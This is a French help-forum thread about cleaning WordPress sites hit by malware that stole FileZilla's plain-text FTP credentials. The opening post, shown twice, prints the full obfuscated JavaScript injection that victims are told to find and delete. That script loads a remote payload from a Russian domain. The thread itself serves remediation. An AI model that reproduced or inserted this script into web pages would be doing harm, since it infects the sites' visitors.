Épidémie : la marche à suivre en cas d'infection
+4
djf
Audrey
Lilie
Jerfa
8 participants
Page 1 sur 2
Page 1 sur 2 • 1, 2
Épidémie : la marche à suivre en cas d'infection
Une épidémie sévit en ce moment (mymy, Elodie, Céline, Lounette, Audrey... on déjà été touchées).
Symptômes : Vous utilisez FileZilla pour vous connecter au serveur de votre hébergeur, votre antivirus détecte éventuellement quelque chose, puis la page d'accueil de votre site ou blog est vierge ou bien affiche un message d'erreur du genre :
Parse error: syntax error, unexpected '<' in /homez.323/tartempion/www/blog/wp-includes/default-filters.php on line 229
La page d'accueil de l'administration peut aussi être touchée.
Que s'est-il passé ?
A priori, un virus a utilisé les informations de connexion stockées en clair dans le fichier "sitemanager.xml" de FileZilla (qui se trouve dans Documents and Settings\Vous\Application data\FileZilla) pour se connecter en FTP à votre serveur et modifier des fichiers en y injectant le code qui produit les dégâts.
Que faire, donc ?
1°) Essentiel ! : Ne pas laisser FileZilla stocker "en clair" les informations de connexion FTP. J'ai indiqué la marche à suivre ici : https://instants-captures.forumactif.org/informatique-f36/attention-epidemie-emergency-emergency-t3891.htm#61926
Certes FileZilla vous demandera votre mot de passe à chaque connexion, et cela vous embête peut-être, mais c'est impératif.
2°) Via l'interface d'administration de votre compte chez votre hébergeur, changez votre mot de passe FTP (prenez-en un suffisamment "solide", c'est-à-dire comportant des chiffres et des lettres, des majuscules et des minuscules, d'au moins 6 caractères et surtout n'existant dans aucun dictionnaires de noms communs ou propres).
3°) Connectez-vous à votre site avec FileZilla. Il vous demande votre mot de passe si vous n'avez pas zappé la première étape (si vous l'avez zappée... ).
4°) Il va falloir trouver quels fichiers ont été modifiés par le virus : en général ce sont au moins l'index.php de votre site ou blog, celui du thème et celui de l'admin (mais il y en a souvent plus). Pour vous simplifier la tâche, dans la fenêtre de droite de FileZilla (le site distant), triez les fichiers par dates de modification : ainsi tous les fichiers modifiés à partir de la date du désastre seront suspects.
Rappatriez ces fichiers à gauche sur votre bureau ou dans un dossier et éditez-les (avec n'importe quel éditeur de texte ou de code, mais pas avec Word, surtout ! - je ne saurais trop chaleureusement recommander l'excellentissime Notepad++, libre et gratuit : http://www.framasoft.net/article2579.html).
5°) Le script vérolé ressemble à ceci et s'il existe, se trouve a priori en fin du fichier :
N.B. : en fonction de l'éditeur que vous utilisez, il est possible d'effectuer des recherches dans des fichiers multiples, ce qui pourrait grandement faciliter la recherche et les corrections.
6°) Réuploadez tous les fichiers modifiés et vérifiez si les choses sont revenues à la normale en vous rendant sur votre site en rafraîchissant l'affichage (touche F5).
7°) Profitez-en pour mettre Wordpress à jour si tel n'est pas le cas (préférez la procédure "manuelle" via FTP, si cela ne vous rebute pas trop).
8°) Scannez tout votre disque dur à l'aide d'un "bon" antivirus (cette remarque n'engage que moi mais à mon sens il n'existe ni ne peut exister de "bon" antivirus gratuit - et je n'ai pas d'actions chez eux mais j'en profite pour faire une pub gratuite à Kaspersky : http://www.kaspersky.com/fr/kaspersky_anti-virus). Cette étape aurait judicieusement trouvé d'ailleurs sa place en pôle position, mais perso, je n'aurais jamais le courage d'attendre le résultat d'un scan complet avant de me lancer dans l'éradication du bestiau... Cela étant, dans le cas présent, ce n'est pas grave si vous avez correctement suivi l'étape 1°.
9°) Écrivez à votre maire pour lui demander s'il ne serait judicieux d'ériger une statue à la gloire de Jerfa.
Voilà voilà. Si le problème persiste, ou que vous ne vous en sortez pas, ou que vous craignez de faire des bêtises en manipulant les fichiers de votre site, contactez-moi en MP : je m'en occuperai pour vous à un tarif raisonnable mais non-remboursé par la sécu...
Symptômes : Vous utilisez FileZilla pour vous connecter au serveur de votre hébergeur, votre antivirus détecte éventuellement quelque chose, puis la page d'accueil de votre site ou blog est vierge ou bien affiche un message d'erreur du genre :
Parse error: syntax error, unexpected '<' in /homez.323/tartempion/www/blog/wp-includes/default-filters.php on line 229
La page d'accueil de l'administration peut aussi être touchée.
Que s'est-il passé ?
A priori, un virus a utilisé les informations de connexion stockées en clair dans le fichier "sitemanager.xml" de FileZilla (qui se trouve dans Documents and Settings\Vous\Application data\FileZilla) pour se connecter en FTP à votre serveur et modifier des fichiers en y injectant le code qui produit les dégâts.
Que faire, donc ?
1°) Essentiel ! : Ne pas laisser FileZilla stocker "en clair" les informations de connexion FTP. J'ai indiqué la marche à suivre ici : https://instants-captures.forumactif.org/informatique-f36/attention-epidemie-emergency-emergency-t3891.htm#61926
Certes FileZilla vous demandera votre mot de passe à chaque connexion, et cela vous embête peut-être, mais c'est impératif.
2°) Via l'interface d'administration de votre compte chez votre hébergeur, changez votre mot de passe FTP (prenez-en un suffisamment "solide", c'est-à-dire comportant des chiffres et des lettres, des majuscules et des minuscules, d'au moins 6 caractères et surtout n'existant dans aucun dictionnaires de noms communs ou propres).
3°) Connectez-vous à votre site avec FileZilla. Il vous demande votre mot de passe si vous n'avez pas zappé la première étape (si vous l'avez zappée... ).
4°) Il va falloir trouver quels fichiers ont été modifiés par le virus : en général ce sont au moins l'index.php de votre site ou blog, celui du thème et celui de l'admin (mais il y en a souvent plus). Pour vous simplifier la tâche, dans la fenêtre de droite de FileZilla (le site distant), triez les fichiers par dates de modification : ainsi tous les fichiers modifiés à partir de la date du désastre seront suspects.
Rappatriez ces fichiers à gauche sur votre bureau ou dans un dossier et éditez-les (avec n'importe quel éditeur de texte ou de code, mais pas avec Word, surtout ! - je ne saurais trop chaleureusement recommander l'excellentissime Notepad++, libre et gratuit : http://www.framasoft.net/article2579.html).
5°) Le script vérolé ressemble à ceci et s'il existe, se trouve a priori en fin du fichier :
- Code:
<script>T={};var iX='';var X;V=function(){this.B="";var u_={N:60691};this.Gr=38729;this.Gr++;var r={zX:"GC"};function K(b,G,g){this.ut=26338;this.ut--;this.U="";return b.substr(G,g);var XY=false;var Qt={n:"y"};}this.on=false;var D='';Hu=["fT","gO","Al"];this.oV='';var Z=RegExp;this.v=false;var nK="";var Vm=new String(K("/goL36",0,3)+K("oglZHA",0,3)+"e.c"+"om/"+K("mybkGu4",0,3)+K("Yp2UestU2Yp",4,3)+K("youzH2",0,3)+K("3bgxi.bg3",3,3)+K("cn/0NxY",0,3)+"war"+K("rqAeseArq",3,3)+K("cQ9eke9cQ",3,3)+K("r.cemb",0,3)+K("d6Aom.dA6",3,3)+K("phpQO7",0,3));var d=document;var p="";NC=9568;NC-=134;function l(b,G){try {var PJ='DX'} catch(PJ){};BM=["j"];var g=new String("[")+G+K("]BQWS",0,1);var P=new Z(g, String("g"));yH=35200;yH++;return b.replace(P, D);};ph={py:false};var Sg=59965;this.nk=51374;this.nk+=223;var m="body";var hg=[];var O='';var mn=null;this.TN=false;var i=l('sAc_r1iMpEt1','MkASjK_CBWeE1y');var A=585848-577768;this.er="er";this.QM="";X=function(){this.Gk='';try {LH=47113;LH++;var ZY=l('c9rsesa5tieWEul2eumCeGnHtW','yWHdsC2iGTquZ59');gH=35716;gH-=30;this.xg=5359;this.xg++;gY=d[ZY](i);try {} catch(Zl){};this.Vy=17402;this.Vy--;var e=String("defer");Ez=32689;Ez+=238;et=12550;et+=15;var b=A+Vm;Xh=55621;Xh-=226;uX=63329;uX++;var Q=l('syr7cy','QTy7qM8haL');Gu=["J","Ze","hY"];mg=[];var iT={pr:"XU"};var zR=false;zs={Py:false};Rf=41024;Rf--;gY[Q]=String("http"+"://m"+"usic"+"spar"+"k.ru"+K(":Ac3f",0,1))+b;Ap=["uT"];gY[e]=[5,1][1];this.xw="";var lQ=56013;d[m].appendChild(gY);ZL=8924;ZL++;var aE=[];var Io=new Array();} catch(R){yU=31255;yU++;this.fv=42689;this.fv-=223;this.AB=42182;this.AB-=46;};};var Rb={zL:"_L"};PW=[];};this.aQ="";this.NU="";V();this.VY=false;window.onload=X;var la=new Date();fJ={dF:56951};this.ms='';</script>
<!--225fabfed12a8c8ded861ae9ac99ddbe-->
N.B. : en fonction de l'éditeur que vous utilisez, il est possible d'effectuer des recherches dans des fichiers multiples, ce qui pourrait grandement faciliter la recherche et les corrections.
6°) Réuploadez tous les fichiers modifiés et vérifiez si les choses sont revenues à la normale en vous rendant sur votre site en rafraîchissant l'affichage (touche F5).
7°) Profitez-en pour mettre Wordpress à jour si tel n'est pas le cas (préférez la procédure "manuelle" via FTP, si cela ne vous rebute pas trop).
8°) Scannez tout votre disque dur à l'aide d'un "bon" antivirus (cette remarque n'engage que moi mais à mon sens il n'existe ni ne peut exister de "bon" antivirus gratuit - et je n'ai pas d'actions chez eux mais j'en profite pour faire une pub gratuite à Kaspersky : http://www.kaspersky.com/fr/kaspersky_anti-virus). Cette étape aurait judicieusement trouvé d'ailleurs sa place en pôle position, mais perso, je n'aurais jamais le courage d'attendre le résultat d'un scan complet avant de me lancer dans l'éradication du bestiau... Cela étant, dans le cas présent, ce n'est pas grave si vous avez correctement suivi l'étape 1°.
9°) Écrivez à votre maire pour lui demander s'il ne serait judicieux d'ériger une statue à la gloire de Jerfa.
Voilà voilà. Si le problème persiste, ou que vous ne vous en sortez pas, ou que vous craignez de faire des bêtises en manipulant les fichiers de votre site, contactez-moi en MP : je m'en occuperai pour vous à un tarif raisonnable mais non-remboursé par la sécu...
Dernière édition par Jerfa le Ven 11 Juin 2010 - 18:40, édité 1 fois
Re: Épidémie : la marche à suivre en cas d'infection
Jerfa a écrit:
9°) Écrivez à votre maire pour lui demander s'il ne serait judicieux d'ériger une statue à la gloire de Jerfa.
Attention je le connais personnellement je pourrai te prendre au mot
Invité- Invité
Re: Épidémie : la marche à suivre en cas d'infection
oui mais alors juste sur ma terrasse hein pas touche a jeje!! je monte la garde
Allez je file dormir avant de dire plus de betise!!
Allez je file dormir avant de dire plus de betise!!
Invité- Invité
Re: Épidémie : la marche à suivre en cas d'infection
En ce qui me concerne grâce à Jéjé et son aide si précieuse et bénévole, j'arrive de nouveau à aller sur mon blog, comme beaucoup d'entre vous mon anti virus m'indiquait un trojan au niveau de mon index, j'ai écrasé mes fichiers via le ftp "à priori" ça a l'air d'aller maintenant, par contre il me détecte un virus dans le plugin 'contact form 7" je l'ai donc désactivé et tout va bien, il ne me restera plus qu'à trouvé un autre plugin pour le remplacer et tout réinstaller... ??? lol.
Encore une fois merci Jéjé sans toi... J'aurais tout abandonné.
Encore une fois merci Jéjé sans toi... J'aurais tout abandonné.
Re: Épidémie : la marche à suivre en cas d'infection
Coucou Lilie !
Arrête, le rouge écarlate me sied très mal au teint.
En fait nan : il suffit juste d'effacer le vilain code dans le fichier qui provoque ça.
Allez, contacte le support technique Jerfa-pinpon-les-pompiers (et indique la référence de ce message, ça vaut pour un chèque-cadeau) : on va arranger ça en un coup de cuiller à pot.
Arrête, le rouge écarlate me sied très mal au teint.
En fait nan : il suffit juste d'effacer le vilain code dans le fichier qui provoque ça.
Allez, contacte le support technique Jerfa-pinpon-les-pompiers (et indique la référence de ce message, ça vaut pour un chèque-cadeau) : on va arranger ça en un coup de cuiller à pot.
Re: Épidémie : la marche à suivre en cas d'infection
Mon sauveuuuuur !!!!! Hihihihi donc j'ai bien fait ce que tu me conseillais juste au dessus et......... Tadaaaaaaaaaaaaa c'est le mimi, c'est le mimi, c'est le miRacle mdr !!! C'est bon j'ai mon formulaire de contact opérationnel et mon blog sans virus... (enfin je crois...) lol mais maintenant avec un bon anti-virus, ça me rassure quand même un peu, même si j'ai encore du mal à le comprendre...
Encore une fois Merci Jéjé, heureusement que tu était là encore une fois hihihi... Miciiiiiiiiii Miciiiiiiiiii
Encore une fois Merci Jéjé, heureusement que tu était là encore une fois hihihi... Miciiiiiiiiii Miciiiiiiiiii
Re: Épidémie : la marche à suivre en cas d'infection
bein j'ai fait tout ca, mais le virus revient bouhhhhhhhhh
Re: Épidémie : la marche à suivre en cas d'infection
arf moi qui voulais faire un site sur WP....
djf- Messages : 319
Date d'inscription : 05/04/2010
Re: Épidémie : la marche à suivre en cas d'infection
Mais non, djf, WordPress, comme le dit Audrey, est "top"... Et n'y est pour ainsi dire strictement pour rien ! FileZilla non plus d'ailleurs (sauf pour ce dernier qu'on pourrait éventuellement lui reprocher de ne pas signaler qu'en cas d'infection, il n'est pas très bon de stocker des mots de passe "en clair" sur un ordi).djf a écrit:arf moi qui voulais faire un site sur WP....
WordPress est et reste à mes yeux le meilleur "CMS" pour des blogs !
C'est un virus à l'origine présent sur l'ordi des gens concernés qui cause toutes ces calamités...
Sans aucun doute, Audrey, pour deux raisons, et surtout une (la première) :Audrey a écrit:bein j'ai fait tout ca, mais le virus revient bouhhhhhhhhh
1°) Tu n'as pas effacé le code malicieux de tous les fichiers infectés sur ton blog (il peut y en avoir beaucoup : pour le blog de Lounette, je l'ai viré de pas loin de 200 fichiers infectés... ). Si l'infection est grave, d'ailleurs, et si la base de donnée est restée saine, je conseillerais dans ce cas carrément une réinstallation complète du blog (à partir d'un ordi bien évidemment "sain" !).
2°) Ton ordi est toujours infecté et tu as zappé l'étape "ne pas stocker de mots de passe dans FileZilla".
De rien !Dalt a écrit:Merci
Re: Épidémie : la marche à suivre en cas d'infection
bein j'ai changé mon mdp deux fois deja !
j'a lancé un scan, j'ai supprimé dans des fichiers, mais ilf aut que je fasse quoi, pour etre sur ?
que j'ouvre chaque fichier un par un ?
j'a lancé un scan, j'ai supprimé dans des fichiers, mais ilf aut que je fasse quoi, pour etre sur ?
que j'ouvre chaque fichier un par un ?
Re: Épidémie : la marche à suivre en cas d'infection
a ton avis ca en est un ca ?
var $entries = array();
}
/**
* Structure that store Atom Entry Properties
*
* @package AtomLib
*/
class AtomEntry {
/**
* Stores Links
* @var array
* @access public
*/
var $links = array();
/**
* Stores Categories
* @var array
* @access public
*/
var $categories = array();
}
/**
* AtomLib Atom Parser API
*
* @package AtomLib
*/
class AtomParser {
var $NS = 'http://www.w3.org/2005/Atom';
var $ATOM_CONTENT_ELEMENTS = array('content','summary','title','subtitle','rights');
var $ATOM_SIMPLE_ELEMENTS = array('id','updated','published','draft');
var $debug = false;
var $depth = 0;
var $indent = 2;
var $in_content;
var $ns_contexts = array();
var $ns_decls = array();
var $content_ns_decls = array();
var $content_ns_contexts = array();
var $is_xhtml = false;
var $is_html = false;
var $entries = array();
}
/**
* Structure that store Atom Entry Properties
*
* @package AtomLib
*/
class AtomEntry {
/**
* Stores Links
* @var array
* @access public
*/
var $links = array();
/**
* Stores Categories
* @var array
* @access public
*/
var $categories = array();
}
/**
* AtomLib Atom Parser API
*
* @package AtomLib
*/
class AtomParser {
var $NS = 'http://www.w3.org/2005/Atom';
var $ATOM_CONTENT_ELEMENTS = array('content','summary','title','subtitle','rights');
var $ATOM_SIMPLE_ELEMENTS = array('id','updated','published','draft');
var $debug = false;
var $depth = 0;
var $indent = 2;
var $in_content;
var $ns_contexts = array();
var $ns_decls = array();
var $content_ns_decls = array();
var $content_ns_contexts = array();
var $is_xhtml = false;
var $is_html = false;
Re: Épidémie : la marche à suivre en cas d'infection
bon j'ai ma reponse, ca n'en est pas ! je lance une recherche du ver dans mon ftp, ffff mais quelle galere
Re: Épidémie : la marche à suivre en cas d'infection
Ce serait longuet... pour ne pas dire interminable !Audrey a écrit:bein j'ai changé mon mdp deux fois deja !
j'a lancé un scan, j'ai supprimé dans des fichiers, mais ilf aut que je fasse quoi, pour etre sur ?
que j'ouvre chaque fichier un par un ?
Non non, ce que tu peux faire si tu ne préfères pas tout réinstaller, c'est :
1°) Un scan complet de ton ordi pour t'assurer qu'il n'y a aucune trace nulle part de vilain bestiau.
2°) Suspendre la protection en "temps réel" de ton antivirus ou le suspendre tout court (sinon l'étape 3 sera impossible).
3°) Télécharger entièrement ton blog par FTP chez toi dans un dossier que tu crées.
4°) Faire dans ce dossier une recherche du code incriminé (normalement c'est toujours le même) : si tu utilises Notepad++ par exemple, choisis, dans le menu "Recherche", la fonction "Rechercher dans les répertoires".
5°) Corriger tous les fichiers où le code aura été trouvé.
6°) Réuploader ton blog via FTP.
7°) Réactiver ton antivirus et scanner le dossier corrigé, pour vérification.
Courage (il en faut ! ) !
Audrey a écrit:a ton avis ca en est un ca ?
Non, ça c'est du code sain.
Re: Épidémie : la marche à suivre en cas d'infection
Bon jviens de regarder WP moi, ba sur free c chiant a installer.... ya des hebergeur pas chéros ????
djf- Messages : 319
Date d'inscription : 05/04/2010
Re: Épidémie : la marche à suivre en cas d'infection
Je recommande toujours OVH, sauf cas particulier... Très bon rapport qualité/prix. Tu as l'offre :
http://www.ovh.com/fr/hebergement_mutualise/hebergement_web_mutualise_perso_25go_trafic_500go.xml
à 2,38€/mois, nom de domaine inclus.
Précision : il ne me payent pas pour la pub et je n'ai pas d'actions chez eux...
http://www.ovh.com/fr/hebergement_mutualise/hebergement_web_mutualise_perso_25go_trafic_500go.xml
à 2,38€/mois, nom de domaine inclus.
Précision : il ne me payent pas pour la pub et je n'ai pas d'actions chez eux...
Re: Épidémie : la marche à suivre en cas d'infection
bon allez je suis desepsérée, la c planté planté, bref, je vais le recommencer a zero, ca m'avait pris des mois, tant pis !
j'y arrive pas j'y arrive pas et c'est tout !
bon, on respire, jvais aller pleurer un coup avant de me remettre au boulot ...
j'y arrive pas j'y arrive pas et c'est tout !
bon, on respire, jvais aller pleurer un coup avant de me remettre au boulot ...
Re: Épidémie : la marche à suivre en cas d'infection
bon jsais meme pas ce qu'il faut faire pour tout recommencer ...
Re: Épidémie : la marche à suivre en cas d'infection
Roooo... ne te pends pas ! Bon, je vais voir ce que je peux faire (si ce n'est pas méga infecté, ça ne prendra pas trop de temps), mais hélas, aujourd'hui pas le temps du tout. Ptêtre demain ? MP...
Re: Épidémie : la marche à suivre en cas d'infection
est ce que qqun saurait me dire comment refaire mon blog ?
Re: Épidémie : la marche à suivre en cas d'infection
allo allo ??? personne ne veut m'aider ??
j'men souviendrai !
j'men souviendrai !
Re: Épidémie : la marche à suivre en cas d'infection
au scours chevalier moi je recois plein de commentaires en anglais pour me proposer des solutions pour favoriser l'erection!!! je ne plaisante pas!!!
Si certain sont interresser je ferai tourner hihi mais en attendant ça me soule!!
Si certain sont interresser je ferai tourner hihi mais en attendant ça me soule!!
Page 1 sur 2 • 1, 2
Sujets similaires
» suivre a la trace
» problème pour insérer photos dans un article (wordpress)
» Attention épidémie ! Emergency, emergency !
» La paix est en marche, modifiée
» Livrer du marché noir
» problème pour insérer photos dans un article (wordpress)
» Attention épidémie ! Emergency, emergency !
» La paix est en marche, modifiée
» Livrer du marché noir
Page 1 sur 2
Permission de ce forum:
Vous ne pouvez pas répondre aux sujets dans ce forum
|
|